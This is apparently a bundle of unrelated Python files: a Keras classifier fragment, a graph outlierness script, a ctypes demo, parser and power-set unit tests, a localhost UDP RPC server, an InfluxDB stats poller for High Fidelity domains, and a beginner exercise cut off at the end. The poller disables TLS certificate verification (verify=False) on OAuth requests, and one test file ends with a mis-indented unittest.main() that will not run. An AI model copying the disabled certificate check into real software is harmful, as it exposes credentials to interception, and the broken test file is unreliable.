        #return numpy.concatenate((tr, si, lm))
        # Current feature set: all three embeddings plus the landmark -
        # trajector difference (commented lines record earlier variants).
        return numpy.concatenate((tr, si, lm, lm - tr))
        #return numpy.concatenate((si, lm - tr, tr - lm))
    def generate(self, values):
        """Stack per-record feature vectors into a 2-D numpy array."""
        return numpy.array([self.generate_record(value) for value in values])
class SpatialClassifier:
    """Dense softmax network deciding whether a (trajector, indicator,
    landmark) triple expresses a spatial relation."""
    def __init__(self, feature_generator):
        # FeatureGenerator that turns word triples into input vectors.
        self.gen = feature_generator
        self.model = self.create_model()
        # Filled with a scalar test-accuracy percentage after fit().
        self.score = []
    def create_model(self):
        """Build and compile the MLP; input width is probed from the
        feature generator with a dummy triple."""
        input_size = len(self.gen.generate_record(("a", "b", "c")))
        inputs = keras.Input(shape=(input_size,))
        x = inputs
        # Funnel architecture with heavy (0.8) dropout after every layer.
        x = layers.Dense(input_size, activation='relu')(x)
        x = layers.Dropout(0.8)(x)
        x = layers.Dense(900, activation='relu')(x)
        x = layers.Dropout(0.8)(x)
        x = layers.Dense(600, activation='relu')(x)
        x = layers.Dropout(0.8)(x)
        x = layers.Dense(300, activation='relu')(x)
        x = layers.Dropout(0.8)(x)
        #x = layers.Dense(100, activation=tf.nn.relu)(x)
        #x = layers.Dropout(0.8)(x)
        #outputs = layers.Dense(2, activation='sigmoid')(x)
        outputs = layers.Dense(2, activation='softmax')(x)
        model = keras.Model(inputs=inputs, outputs=outputs, name='spatial_tr_si_lm_classifier')
        model.summary()
        model.compile(loss='sparse_categorical_crossentropy',
                      optimizer=keras.optimizers.RMSprop(),
                      metrics=['accuracy'])
        return model
    def fit(self, train_x, train_y, test_x, test_y):
        """Train for 40 epochs with per-class/total accuracy callbacks;
        stores the averaged test accuracy (percent) in self.score."""
        callback_train = ClassAccuracy(train_x, train_y, 1, "Class accuracy on train")
        callback_train_acc = Accuracy(train_x, train_y, "Total accuracy on train")
        callback_test_1 = ClassAccuracy(test_x, test_y, 1, "Class accuracy on test")
        callback_test_0 = ClassAccuracy(test_x, test_y, 0, "Class accuracy on test")
        callback_test_acc = Accuracy(test_x, test_y, "Total accuracy on test")
        callbacks = [callback_train, callback_train_acc, callback_test_1, callback_test_0, callback_test_acc]
        print(train_x.shape)
        self.model.fit(train_x, train_y, epochs=40, validation_split=0.2, verbose=1, callbacks=callbacks)
        # Average of the last 5 epochs' test accuracy, as a percentage.
        self.score = callback_test_acc.avg_score(5) * 100
    def save(self, path):
        """Persist the underlying keras model."""
        self.model.save(path)
    def load(self, path):
        """Replace the model with one loaded from disk."""
        self.model = keras.models.load_model(path)
    def predict(self, trajector, spatial_indicator, landmark):
        """Classify one triple; returns LABEL_SPATIAL or LABEL_OTHER."""
        x = [trajector, spatial_indicator, landmark]
        x = self.gen.generate([x])
        y = self.model.predict_on_batch(x)[0]
        return LABEL_SPATIAL if y[1] > y[0] else LABEL_OTHER
    def get_score(self):
        return self.score
    @staticmethod
    def load_model(feature_generator, model_path):
        """Alternate constructor: build a classifier and load weights."""
        classifier = SpatialClassifier(feature_generator)
        classifier.load(model_path)
        return classifier
|
from igraph import *
import pandas as pd
import numpy as np
def get_graph():
    """Load the Facebook graph and weight each edge by the number of
    binary features its two endpoint vertices share.

    BUG FIX: the original reused `i` as both the edge-loop index and the
    list-comprehension variable (`[int(i) for i in result1]`). Under
    Python 2 — which this module targets (see the print statement in
    get_outlierness_EWPL) — comprehension variables leak into the
    enclosing scope, so the edge index was clobbered and weights were
    written to the wrong edges. Distinct names fix this while keeping
    the intended behavior.
    """
    graph = Graph.Read_Ncol("dataset/facebook_combined.txt", directed=False)
    dataset = pd.read_csv("dataset/fb-features.txt", header=None, sep=' ')
    num_features = len(dataset.columns)
    V = graph.vcount()
    E = graph.ecount()
    # features[v] = list of feature column indices set to 1 for vertex v.
    features = {}
    for v in range(V):
        features[v] = [f for f in range(num_features) if dataset[f][v] == 1]
    ends_graph = graph.es
    # Edge weight = size of the intersection of endpoint feature sets.
    for e in range(E):
        src_feats = set(int(f) for f in features[ends_graph[e].source])
        tgt_feats = set(int(f) for f in features[ends_graph[e].target])
        graph.es[e]["weight"] = len(src_feats & tgt_feats)
    return graph
def get_outlierness_EWPL(g):
    """Score each vertex's outlierness with the Edge Weight Power Law
    (EWPL) from the OddBall algorithm.

    For each vertex the egonet (vertex + neighbours) is extracted; the
    score compares the egonet's total edge weight against C * E**beta,
    where E is the egonet's edge count.

    FIX: the debug print used Python 2 statement syntax (`print x`);
    rewritten with parentheses, which is valid on both Python 2 and 3
    and matches the print() calls elsewhere in this module.

    NOTE(review): `log10` and `normalize_vector` are not defined in this
    file — presumably supplied by `from igraph import *` or a missing
    import; confirm before running.
    """
    V = g.vcount()
    E = g.ecount()
    # ego_graph[i] is the ego graph (vertex i plus its neighbourhood).
    ego_graph = []
    for i in range(V):
        ego_graph.append(g.subgraph(g.neighborhood(i)))
    print(ego_graph[0].es[0]['weight'])
    # ego_edgesize[i] = number of edges in vertex i's egonet.
    ego_edgesize = []
    for x in ego_graph:
        ego_edgesize.append(x.ecount())
    # ego_weight[i] = sum over the egonet's edges of (weight + 1); the +1
    # keeps zero-weight edges from zeroing the total.
    ego_weight = [0]*V
    for i in range(0, V):
        for j in range(0, len(ego_graph[i].es)):
            ego_weight[i] += ego_graph[i].es[j]['weight'] + 1
    C = 1
    beta = 1.15
    # Outlierness is calculated according to the Edge Weight Power Law of
    # the OddBall algorithm.
    outlierness = [0]*V
    for i in range(0, V):
        outlierness[i] = (max(ego_weight[i], C*(ego_edgesize[i]**beta)) / min(ego_weight[i], C*(ego_edgesize[i]**beta))) * (log10(abs(ego_weight[i] - C*(ego_edgesize[i]**beta)) + 1))
    outlierness = normalize_vector(outlierness)
    return outlierness
# Build the weighted graph and print the EWPL outlierness scores.
# NOTE(review): the commented lines below are leftover R syntax from the
# original prototype.
graph = get_graph()
#E(graph)$weight
#outlierness_EDPL <- get_outlierness_EDPL(graph)
outlierness_EWPL = get_outlierness_EWPL(graph)
print(outlierness_EWPL)
|
'''
Demo: calling a C function (pow) from Python via ctypes, and why
restype/argtypes matter.

author: juzicode
address: www.juzicode.com
WeChat account: 桔子code/juzicode
date: 2020.7.15
'''
print('\n')
print('-----欢迎来到www.juzicode.com')
print('-----公众号: juzicode/桔子code\n')
from ctypes import *
# Two C doubles to hand to the native pow().
a = c_double(3.0)
b = c_double(2.0)
print('a=',a)
print('a.value=',a.value)
print('b=',b)
print('b.value=',b.value)
libc = CDLL('msvcrt.dll') # load the Windows C runtime DLL (Windows-only)
# First call WITHOUT declaring the prototype: ctypes assumes an int
# return value, so the printed result is wrong — that is the point of
# this demo.
ret = libc.pow(a,b) # call the C function via attribute access
print('pow(a,b):',ret)
# Declare the C prototype so arguments and result convert correctly.
libc.pow.restype = c_double
libc.pow.argtypes = (c_double, c_double)
ret = libc.pow(a,b) # now the correct double is returned
print('pow(a,b):',ret)
import os
import unittest
from unittest.mock import patch
from mavedbconvert import parsers, exceptions, constants
from mavedbconvert.tests import ProgramTestCase
# TODO: convert these tests to use temp directories
TEST_DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
class TestParseBoolean(unittest.TestCase):
    """parse_boolean: only True / "True" count as truthy."""
    def test_true_if_str_of_true(self):
        self.assertTrue(parsers.parse_boolean(True))
        self.assertTrue(parsers.parse_boolean("True"))
    def test_false_if_not_repr_of_true(self):
        self.assertFalse(parsers.parse_boolean(None))
        self.assertFalse(parsers.parse_boolean("none"))
        self.assertFalse(parsers.parse_boolean(""))
        self.assertFalse(parsers.parse_boolean(False))
class TestParseNumeric(unittest.TestCase):
    """parse_numeric: casts to the requested dtype or raises ValueError."""
    def test_converts_to_dtype(self):
        self.assertIsInstance(
            parsers.parse_numeric("1", name="int", dtype=float), float
        )
    def test_value_error_cannot_cast_to_dtype(self):
        with self.assertRaises(ValueError):
            parsers.parse_numeric(None, name="value", dtype=int)
        with self.assertRaises(ValueError):
            parsers.parse_numeric("a", name="value", dtype=int)
class TestParseString(unittest.TestCase):
    """parse_string: strips whitespace; falsey/blank input maps to None."""
    def test_returns_none_if_falsey(self):
        self.assertIsNone(parsers.parse_string(None))
        self.assertIsNone(parsers.parse_string(" "))
        self.assertIsNone(parsers.parse_string(""))
    def test_returns_string_stripped_of_ws(self):
        self.assertEqual(parsers.parse_string(" aaa "), "aaa")
class TestParseSrc(unittest.TestCase):
    """parse_src: validates that the source path is an existing file."""
    @patch(
        "mavedbconvert.parsers.parse_string",
        return_value=os.path.join(TEST_DATA_DIR, "enrich2", "enrich2.tsv"),
    )
    def test_calls_parse_string(self, patch):
        parsers.parse_src(os.path.join(TEST_DATA_DIR, "enrich2", "enrich2.tsv"))
        patch.assert_called()
    def test_ok_file_exists(self):
        path = os.path.join(TEST_DATA_DIR, "enrich2", "enrich2.tsv")
        self.assertEqual(path, parsers.parse_src(path))
    def test_error_no_value(self):
        for v in (None, "None", ""):
            with self.assertRaises(ValueError):
                parsers.parse_src(v)
    def test_error_file_not_found(self):
        path = os.path.join(TEST_DATA_DIR, "enrich2", "missing_file.tsv")
        with self.assertRaises(FileNotFoundError):
            parsers.parse_src(path)
    def test_error_file_is_a_dir(self):
        with self.assertRaises(IsADirectoryError):
            parsers.parse_src(os.path.join(TEST_DATA_DIR))
class TestParseDst(ProgramTestCase):
    """parse_dst: normalises/creates the destination directory."""
    @patch(
        "mavedbconvert.parsers.parse_string", return_value=os.path.join(TEST_DATA_DIR)
    )
    def test_calls_parse_string(self, patch):
        parsers.parse_dst(os.path.join(TEST_DATA_DIR))
        patch.assert_called()
    def test_ok_dst_exists(self):
        path = os.path.join(os.path.join(TEST_DATA_DIR))
        self.assertEqual(path, parsers.parse_dst(path))
    def test_returns_none_no_value(self):
        for v in (None, "None", ""):
            self.assertIsNone(parsers.parse_dst(v))
    def test_dst_path_is_normalised(self):
        path = TEST_DATA_DIR + "//fasta"
        self.assertEqual(parsers.parse_dst(path), os.path.join(TEST_DATA_DIR, "fasta"))
    def test_makes_dst_directory_tree(self):
        path = os.path.join(TEST_DATA_DIR, "subdir")
        parsers.parse_dst(path)
        self.assertTrue(os.path.isdir(path))
        # Queue the created directory for cleanup by ProgramTestCase.
        self.bin.append(path)
class TestParseProgram(unittest.TestCase):
    """parse_program: accepts the three supported programs, whether given
    as a name or a docopt-style flag dict."""
    def test_ok_supported_program(self):
        for p in ("enrich2", "enrich", "empiric"):
            parsers.parse_program(p)
    def test_error_unsupported_program(self):
        with self.assertRaises(ValueError):
            parsers.parse_program("aaa")
    def test_sets_correct_program_from_dict(self):
        program = {"enrich": True, "empiric": False, "enrich2": False}
        self.assertEqual(parsers.parse_program(program), "enrich")
        program = {"enrich": False, "empiric": False, "enrich2": True}
        self.assertEqual(parsers.parse_program(program), "enrich2")
        program = {"enrich": False, "empiric": True, "enrich2": False}
        self.assertEqual(parsers.parse_program(program), "empiric")
        with self.assertRaises(ValueError):
            program = {"enrich": False, "empiric": False, "enrich2": False}
            parsers.parse_program(program)
class TestParseWildTypeSequence(unittest.TestCase):
    """parse_wt_sequence: FASTA loading, character validation, and the
    codon-frame rule (length % 3) for coding sequences."""
    def test_can_read_from_fasta(self):
        path = os.path.join(TEST_DATA_DIR, "fasta", "lower.fa")
        wtseq = parsers.parse_wt_sequence(path, program="enrich2", non_coding=True)
        expected = (
            "ACAGTTGGATATAGTAGTTTGTACGAGTTGCTTGTGGCTT"
            "CGCCAGCGCATACCAGCATAGTAAAGGCAACGGCCTCTGA"
            "GAGGCTACGATCGTGCCTTGTGGCAAGTCTTCGCTCGCAC"
            "GCCCTTCCTACCGTGCTATGAGAGGAAATCTCGGGCGTA"
        ).upper()
        self.assertEqual(wtseq, expected)
    def test_error_invalid_chars(self):
        with self.assertRaises(exceptions.InvalidWildTypeSequence):
            parsers.parse_wt_sequence("ATXG", program="enrich2", non_coding=True)
    def test_error_not_divisible_by_three_enrich_empiric(self):
        with self.assertRaises(exceptions.SequenceFrameError):
            parsers.parse_wt_sequence("ATGG", program="enrich")
        with self.assertRaises(exceptions.SequenceFrameError):
            parsers.parse_wt_sequence("ATGG", program="empiric")
    def test_error_not_divisible_by_three_enrich2_coding(self):
        with self.assertRaises(exceptions.SequenceFrameError):
            parsers.parse_wt_sequence("ATGG", program="enrich2")
    def test_ok_not_divisible_by_three_enrich2_noncoding(self):
        parsers.parse_wt_sequence("ATGG", program="enrich2", non_coding=True)
    def test_ok_divisible_by_three_enrich2_coding(self):
        parsers.parse_wt_sequence("ATGATC", program="enrich2")
    def test_ok_divisible_by_three_enrich_empiric(self):
        parsers.parse_wt_sequence("ATGATC", program="enrich")
        parsers.parse_wt_sequence("ATGATC", program="empiric")
class TestParseInputType(unittest.TestCase):
    """parse_input_type: only the scores/counts constants are accepted."""
    @patch("mavedbconvert.parsers.parse_string", return_value="counts")
    def test_calls_parse_string(self, patch):
        parsers.parse_input_type(constants.count_type)
        patch.assert_called()
    def test_error_unrecognised_input_type(self):
        with self.assertRaises(ValueError):
            parsers.parse_input_type("aaa")
    def test_ok_recognised_input_type(self):
        for v in (constants.score_type, constants.count_type):
            parsers.parse_input_type(v)
class TestParseScoreColumn(unittest.TestCase):
    """parse_score_column: a score column is mandatory only for
    enrich/empiric score-type input."""
    @patch("mavedbconvert.parsers.parse_string", return_value="score")
    def test_calls_parse_string(self, patch):
        parsers.parse_score_column("score", constants.score_type, program="enrich")
        patch.assert_called()
    def test_error_enrich_scores_input_and_column_not_defined(self):
        with self.assertRaises(ValueError):
            parsers.parse_score_column(
                value=None, input_type=constants.score_type, program="enrich"
            )
    def test_error_empiric_scores_input_and_column_not_defined(self):
        with self.assertRaises(ValueError):
            parsers.parse_score_column(
                value=None, input_type=constants.score_type, program="empiric"
            )
    def test_ok_enrich_count_input_and_column_not_defined(self):
        parsers.parse_score_column(
            value=None, input_type=constants.count_type, program="enrich"
        )
    def test_ok_empiric_counts_input_and_column_not_defined(self):
        parsers.parse_score_column(
            value=None, input_type=constants.count_type, program="empiric"
        )
    def test_ok_enrich2_and_column_not_defined(self):
        parsers.parse_score_column(
            value=None, input_type=constants.score_type, program="enrich2"
        )
class TestParseOffset(unittest.TestCase):
    """parse_offset: offsets for coding sequences must be multiples of 3."""
    @patch("mavedbconvert.parsers.parse_numeric", return_value=0)
    def test_calls_parse_numeric(self, patch):
        parsers.parse_offset(0, program="enrich")
        patch.assert_called()
    def test_error_enrich2_is_coding_and_not_mult_of_three(self):
        with self.assertRaises(ValueError):
            parsers.parse_offset(1, "enrich2", non_coding=False)
    def test_ok_enrich2_is_coding_and_mult_of_three(self):
        self.assertEqual(-6, parsers.parse_offset("-6", "enrich2", non_coding=False))
    def test_ok_enrich2_non_coding_and_not_mult_of_three(self):
        self.assertEqual(-7, parsers.parse_offset("-7", "enrich2", non_coding=True))
    def test_error_enrich_empiric_offset_not_mult_of_three(self):
        with self.assertRaises(ValueError):
            parsers.parse_offset(1, "enrich", non_coding=False)
        with self.assertRaises(ValueError):
            parsers.parse_offset(1, "empiric", non_coding=False)
    def test_ok_enrich_empiric_offset_mult_of_three(self):
        self.assertEqual(-6, parsers.parse_offset("-6", "enrich"))
        self.assertEqual(-6, parsers.parse_offset("-6", "empiric"))
class TestParseDocopt(unittest.TestCase):
    """parse_docopt: maps a raw docopt argument dict to (program, kwargs)."""
    @staticmethod
    def mock_args(
        program=None,
        src=None,
        dst=None,
        wtseq="AAA",
        offset=0,
        zero_based=False,
        score_column="score",
        hgvs_column=None,
        input_type="scores",
        skip_header="0",
        skip_footer="0",
        sheet_name=None,
        non_coding=False,
    ):
        """Build a docopt-style argument dict with sensible defaults."""
        if program is None:
            program = "enrich2"
        if src is None:
            src = os.path.join(TEST_DATA_DIR, "enrich2", "enrich2.tsv")
        return {
            "enrich": True if program == "enrich" else False,
            "enrich2": True if program == "enrich2" else False,
            "empiric": True if program == "empiric" else False,
            "<src>": os.path.join(TEST_DATA_DIR, program, src),
            "--dst": os.path.join(TEST_DATA_DIR, program, dst) if dst else dst,
            "--score-column": score_column,
            "--hgvs-column": hgvs_column,
            "--skip-header": skip_header,
            "--skip-footer": skip_footer,
            "--sheet-name": sheet_name,
            "--wtseq": wtseq,
            "--offset": offset,
            "--input-type": input_type,
            "--zero-based": zero_based,
            "--non-coding": non_coding,
        }
    def test_returns_correct_program(self):
        for p in ("enrich", "enrich2", "empiric"):
            args = self.mock_args(program=p)
            self.assertEqual(parsers.parse_docopt(args)[0], p)
    def test_is_coding_is_flip_of_non_coding(self):
        args = self.mock_args(non_coding=False)
        _, kwargs = parsers.parse_docopt(args)
        self.assertTrue(kwargs["is_coding"])
        args = self.mock_args(non_coding=True)
        _, kwargs = parsers.parse_docopt(args)
        self.assertFalse(kwargs["is_coding"])
    def test_one_based_is_flip_of_zero_based(self):
        args = self.mock_args(zero_based=False)
        _, kwargs = parsers.parse_docopt(args)
        self.assertTrue(kwargs["one_based"])
        args = self.mock_args(zero_based=True)
        _, kwargs = parsers.parse_docopt(args)
        self.assertFalse(kwargs["one_based"])
    def test_contains_wt_sequence_key(self):
        args = self.mock_args()
        _, kwargs = parsers.parse_docopt(args)
        self.assertIn("wt_sequence", kwargs)
    def test_contains_skip_footer_rows_key(self):
        args = self.mock_args()
        _, kwargs = parsers.parse_docopt(args)
        self.assertIn("skip_footer_rows", kwargs)
    def test_contains_skip_header_rows_key(self):
        args = self.mock_args()
        _, kwargs = parsers.parse_docopt(args)
        self.assertIn("skip_header_rows", kwargs)
if __name__ == "__main__":
unittest.main()
|
import unittest
def subset(x):
    """Return a list of all subsets of set x.

    Recursive strategy: take the power set of x minus one element, then
    duplicate it with that element added to every subset.
    """
    if x == set():
        return [x]
    elems = list(x)
    pivot = elems[-1]
    without_pivot = subset(set(elems[:-1]))
    with_pivot = [s | {pivot} for s in without_pivot]
    return without_pivot + with_pivot
def subset_comb(x):
    """Returns all subsets of given set x, combinatorics approach.

    Each integer in [0, 2**len(x)) acts as a bitmask choosing which
    members belong to the corresponding subset.
    """
    members = list(x)
    return [subset_by_bits(mask, members) for mask in range(2 ** len(members))]
def subset_by_bits(num, x):
    """Return the subset of list x selected by the 1 bits of num.

    Bit i (counting from the least-significant end) selects the element
    x[len(x) - 1 - i], i.e. the mask reads the list right-to-left.
    """
    chosen = set()
    idx = len(x) - 1
    while num:
        if num & 1:
            chosen.add(x[idx])
        num >>= 1
        idx -= 1
    return chosen
class SubsetTest(unittest.TestCase):
    """Checks subset() and subset_comb() against known power sets.

    Test methods are attached dynamically below, one per implementation.
    """

    def to_frozen(self, set_list):
        """Convert a list of sets into a comparable set of frozensets."""
        return {frozenset(i) for i in set_list}


def _make_test(func, expected_subsets, arg):
    """Build a test method asserting func(arg) yields expected_subsets.

    Binding func/expected_subsets/arg as arguments — rather than closing
    over loop variables — avoids the late-binding bug where every
    generated test would see only the last loop value.
    """
    def test(self):
        self.assertEqual(self.to_frozen(expected_subsets),
                         self.to_frozen(func(set(arg))))
    return test


# Attach the same three cases for each implementation under test.
# BUG FIX: the original ran `setattr(SubsetTest, ...)` inside the class
# body, where the class name is not yet bound (NameError), and the test
# bodies referenced a class-body name `func` that is not visible from
# method scope at call time. Generating the methods after the class
# statement completes fixes both problems.
for _name in ['subset', 'subset_comb']:
    _func = globals()[_name]
    _cases = [
        ('single_element', [set(), {1}], {1}),
        ('multiple_elements', [set(), {1}, {2}, {1, 2}], {1, 2}),
        ('more_elements',
         [set(), {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}],
         {1, 2, 3}),
    ]
    for _case_name, _expected, _arg in _cases:
        setattr(SubsetTest, 'test_%s_%s' % (_name, _case_name),
                _make_test(_func, _expected, _arg))

if __name__ == '__main__':
    unittest.main()
|
import socket
from mycode import abc, double_int, say_hello, rpc_test, doggo_test, favorite_number, half_float, bye_professor
import json
# UDP IP address and port
UDP_IP = "127.0.0.1"
UDP_PORT = 5005
# Class for the registry
class RPCRegistry(set):
    """Name-to-callable lookup table for RPC dispatch.

    NOTE(review): inherits from set but never uses any set behavior —
    the mapping dict does all the work; the base class looks vestigial.
    """

    def __init__(self):
        # Maps each registered function's __name__ to the function itself.
        self.registryMapping = {}

    def register(self, func):
        """Expose func for remote calls under its __name__."""
        self.registryMapping[func.__name__] = func
# Class for the Server
class RPCServer:
    """Dispatches JSON-encoded RPC requests to registered functions."""

    def __init__(self):
        # Registry holding every callable exposed over RPC.
        self.registry = RPCRegistry()

    def __call__(self, *args, **kwargs):
        """Decode a JSON request string (args[0]) and invoke the function
        it names with the supplied positional arguments."""
        request = json.loads(args[0])
        target = self.registry.registryMapping[request["name"]]
        return target(*tuple(request["args"]))

    def register(self, wrapper):
        """Add wrapper to the registry; returns it unchanged so this can
        be used as a decorator."""
        self.registry.register(wrapper)
        return wrapper
def serve(passed_server):
    """Blocking UDP loop: receive a JSON request datagram, dispatch it
    through passed_server, and send the JSON-encoded result back to the
    sender's address. Never returns.
    """
    # Set up UDP Socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((UDP_IP, UDP_PORT))
    # Run 5-ever
    while True:
        # Receive Data (requests larger than 1024 bytes are truncated)
        data, address = sock.recvfrom(1024)
        # Decode and Dump JSON
        decoded_data = data.decode()
        return_data = passed_server.__call__(decoded_data)
        # Encode and Send Back Data
        json_return_data = json.dumps(return_data)
        sock.sendto(json_return_data.encode(), address)
if __name__ == '__main__':
    # Set up server
    server = RPCServer()
    # Register wrapped functions. register() returns its argument, so the
    # wrapped_* names are simply the original callables.
    wrapped_abc = server.register(abc)
    wrapped_double = server.register(double_int)
    wrapped_sayhello = server.register(say_hello)
    wrapped_rpc_test = server.register(rpc_test)
    wrapped_doggo_test = server.register(doggo_test)
    wrapped_favorite_number = server.register(favorite_number)
    wrapped_half_float = server.register(half_float)
    wrapped_bye_professor = server.register(bye_professor)
    # Run server (blocks forever)
    serve(server)
|
#!/usr/bin/env python
import json
import logging
import os
import re
import time
import urllib
import urlparse
import requests
from influxdb import InfluxDBClient
logger = logging.getLogger("domain_stats")
class MetaverseAuth:
    """requests auth hook that logs into the High Fidelity metaverse and
    replays the resulting OAuth session cookies on domain-server requests.

    (Python 2 code: relies on the urlparse module and urllib.urlencode.)
    """
    METAVERSE_URL = "https://metaverse.highfidelity.com/oauth"
    TOKEN_URL = "%s/token" % METAVERSE_URL
    AUTHORIZE_URL = "%s/authorize" % METAVERSE_URL
    def __init__(self, username, password):
        # Cookie dicts cached per (domain, port).
        self._cookies = {}
        self._tokens = self._get_access_token(username=username,
                                              password=password)
    # Call once when initialized
    def _get_access_token(self, username=None, password=None):
        """Exchange username/password for an OAuth token dict.

        NOTE(review): implicitly returns None when either credential is
        falsy — a later self._tokens["access_token"] access would then
        fail with a TypeError.
        """
        if username and password:
            resp = requests.post(
                self.TOKEN_URL,
                data={
                    "grant_type": "password",
                    "scope": "owner",
                    "username": username,
                    "password": password,
                },
            )
            tokens = resp.json()
            assert "access_token" in tokens
            return tokens
    def _get_cookies(self, domain, port):
        """Perform the OAuth redirect dance once per (domain, port) and
        cache the resulting session cookies."""
        k = (domain, port)
        if k in self._cookies:
            return self._cookies[k]
        # This request is meant to redirect through the metaverse and
        # back to the domain server. If we followed the redirect it
        # would fail because it's missing the access token. A valid
        # request needs the client_id, state, and access_token. We have
        # to make an intial request to grab the state and client_id, but
        # we don't follow the redirect because it will fail until we add
        # the access token.
        domain_tls_url = "https://%s:%d" % (domain, int(port) + 1)
        domain_url = "http://%s:%d" % (domain, port)
        redirect_resp = requests.get(domain_url, allow_redirects=False)
        location = urlparse.urlparse(redirect_resp.headers["Location"])
        query = urlparse.parse_qs(location.query)
        params = {
            "client_id": query["client_id"][0],
            "response_type": "code",
            "state": query["state"][0],
            "redirect_uri": "%s/oauth" % domain_tls_url,
        }
        oauth_url = "%s?%s" % (self.AUTHORIZE_URL, urllib.urlencode(params))
        # Make the initial authorization request and steal its cookies.
        session = requests.Session()
        headers = {"Authorization": "Bearer %s" % self._tokens["access_token"]}
        session.get(oauth_url, headers=headers, verify=False)
        cookies = session.cookies.get_dict()
        self._cookies[k] = cookies
        return cookies
    def __call__(self, request):
        # requests auth hook: attach cached session cookies as a header.
        url = urlparse.urlparse(request.url)
        cookies = self._get_cookies(url.hostname, url.port)
        cookies_str = "; ".join(("%s=%s" % (k, v) for k, v in cookies.items()))
        request.headers.update({"Cookie": cookies_str})
        return request
class DomainRequester:
    """Fetches JSON documents from a domain server's HTTP port (40100)."""

    def __init__(self, hostname, auth):
        self.hostname = hostname
        self.auth = auth

    def get(self, path):
        """GET http://<hostname>:40100/<path> and return the parsed JSON."""
        root = 'http://%s:40100' % self.hostname
        # Strip leading slashes so the join never doubles them.
        trimmed = re.sub(r'^/+', '', path)
        response = requests.get('/'.join((root, trimmed)), auth=self.auth)
        return response.json()

    def __call__(self, path):
        # Calling the requester is shorthand for get().
        return self.get(path)
def clean_measurement(measurement):
    """Normalize a measurement name and extract per-entity tags.

    Spaces become dashes. For z_avatars/z_listeners measurements the
    second dotted component is a UUID: it is pulled out into a
    {'uuid': ...} tag dict and removed from the name. Everything else
    gets an empty tag dict and the (dash-normalized) name unchanged.
    """
    name = measurement.replace(' ', '-')
    if not name.startswith('z_'):
        return {}, name
    parts = name.split('.')
    if parts[0] in ('z_avatars', 'z_listeners'):
        uuid = parts.pop(1)
        return {'uuid': uuid}, '.'.join(parts)
    return {}, name
def clean_val(val):
    """Coerce val to float, tolerating unit-suffixed ints like '0 usecs'.

    Re-raises the original ValueError when the value is neither a plain
    number nor an integer followed by a unit word.
    """
    try:
        return float(val)
    except ValueError:
        suffixed = re.match(r'^(\d+) \w+$', val)  # like: 0 usecs
        if suffixed is None:
            raise
        return float(suffixed.group(1))
def flatten(key, val):
    """Recursively yield (dotted_key, float_value) pairs from a nested
    dict, skipping None values and anything that cannot be coerced to a
    float (which is logged and dropped)."""
    if isinstance(val, dict):
        for child_key, child_val in val.items():
            dotted = '.'.join((key, child_key)) if key else child_key
            for pair in flatten(key=dotted, val=child_val):
                yield pair
    elif val is not None:
        try:
            # InfluxDB is strongly typed and tries to guess types. If you
            # add a new measurement as 0 it will guess int, but when you
            # later add 0.1234 it will explode because it can't handle a
            # float. So, just assume everything is a float. This means
            # strings won't work, but InfluxDB doesn't like strings anyway.
            numeric = clean_val(val)
        except (TypeError, ValueError):
            logger.warn("couldn't clean value for %s: %s", key, val)
        else:
            yield (key, numeric)
def get_stats(request, domain_name):
    """Yield (measurement, value, tags) triples for the audio and avatar
    mixers of the given domain, flattening each mixer's stats document."""
    nodes_by_type = {node['type']: node for node in request('nodes.json')['nodes']}
    for assignment in ('audio-mixer', 'avatar-mixer'):
        stats_doc = request('nodes/%s.json' % nodes_by_type[assignment]['uuid'])
        for measurement, value in flatten('', stats_doc):
            yield measurement, value, {'domain_name': domain_name,
                                       'assignment': assignment}
def write_stats(request, client_kwargs):
    """Collect one round of domain stats and write them to InfluxDB.

    NOTE(review): reads the module-global `domain_name` (bound in the
    __main__ block) instead of taking it as a parameter — this function
    only works when the module is run as a script.
    """
    client = InfluxDBClient(**client_kwargs)
    # Idempotent: creating an existing database is a no-op server-side.
    client.create_database(client_kwargs['database'])
    stats = get_stats(request, domain_name)
    body = []
    for measurement, value, tags in stats:
        # Merge tags extracted from the measurement name (e.g. avatar uuid).
        _tags, measurement = clean_measurement(measurement)
        tags.update(_tags)
        point = {
            'measurement': measurement,
            'tags': tags,
            'fields': {
                'value': value,
            }
        }
        logger.debug(point)
        body.append(point)
    try:
        client.write_points(body)
    except Exception as exc:
        # Best-effort: log and keep the polling loop alive.
        logger.exception("couldn't write points")
    else:
        logger.info("wrote %d points" % len(body))
if __name__ == '__main__':
    FORMAT = '%(asctime)-15s %(message)s'
    logging.basicConfig(format=FORMAT, level=logging.INFO)
    logger.info("starting")
    # All runtime configuration comes from HIFI_* environment variables.
    domain_name = os.environ.get('HIFI_DOMAIN_NAME')
    sleep_interval = int(os.environ.get('HIFI_SLEEP_INTERVAL', 3))
    client_kwargs = {
        'host': os.environ.get('HIFI_INFLUX_HOST', 'localhost'),
        'port': int(os.environ.get('HIFI_INFLUX_PORT', '8086')),
        'username': os.environ.get('HIFI_INFLUX_USERNAME'),
        'password': os.environ.get('HIFI_INFLUX_PASSWORD'),
        'database': os.environ.get('HIFI_INFLUX_DATABASE', 'domain_stats'),
    }
    # NOTE(review): a non-empty dict literal is always truthy, so this
    # guard always fires; its real job is just dropping unset credentials.
    if client_kwargs:
        if not client_kwargs['username']:
            del client_kwargs['username']
        if not client_kwargs['password']:
            del client_kwargs['password']
    logger.debug("creating request")
    request = DomainRequester(
        '%s.highfidelity.io' % domain_name,
        auth=MetaverseAuth(os.environ.get('HIFI_META_USERNAME'),
                           os.environ.get('HIFI_META_PASSWORD'))
    )
    logger.debug("created request")
    # Poll forever, keeping roughly sleep_interval seconds between rounds
    # by subtracting the time each round took.
    while 1:
        logger.debug("starting loop")
        ts = time.time()
        logger.debug("write stats")
        write_stats(request, client_kwargs)
        sleep_for = sleep_interval - (time.time() - ts)
        logger.info("sleeping for %.02f secs" % sleep_for)
        time.sleep(max(sleep_for, 0))
|
def cheese_and_crackers(cheese_amount, boxes_of_crackers):
    """Print a short report about the given amounts of cheese and crackers."""
    print(f"You have {cheese_amount} cheeses! ")
    print(f"You have {boxes_of_crackers} boxes of crackers! ")
    print("Man that's not enough for a party!")
    print("Get a blanket. \n")
# Demonstrate the different ways arguments can be passed to a function.
# (Typos in the printed messages fixed: "cab"/"functiond"/"comine".)
print("We can just give the function numbers directly:")
cheese_and_crackers(20, 30)
print("OR, we can use variables from our script:")
amount_of_cheese = 10
amount_of_crackers = 50
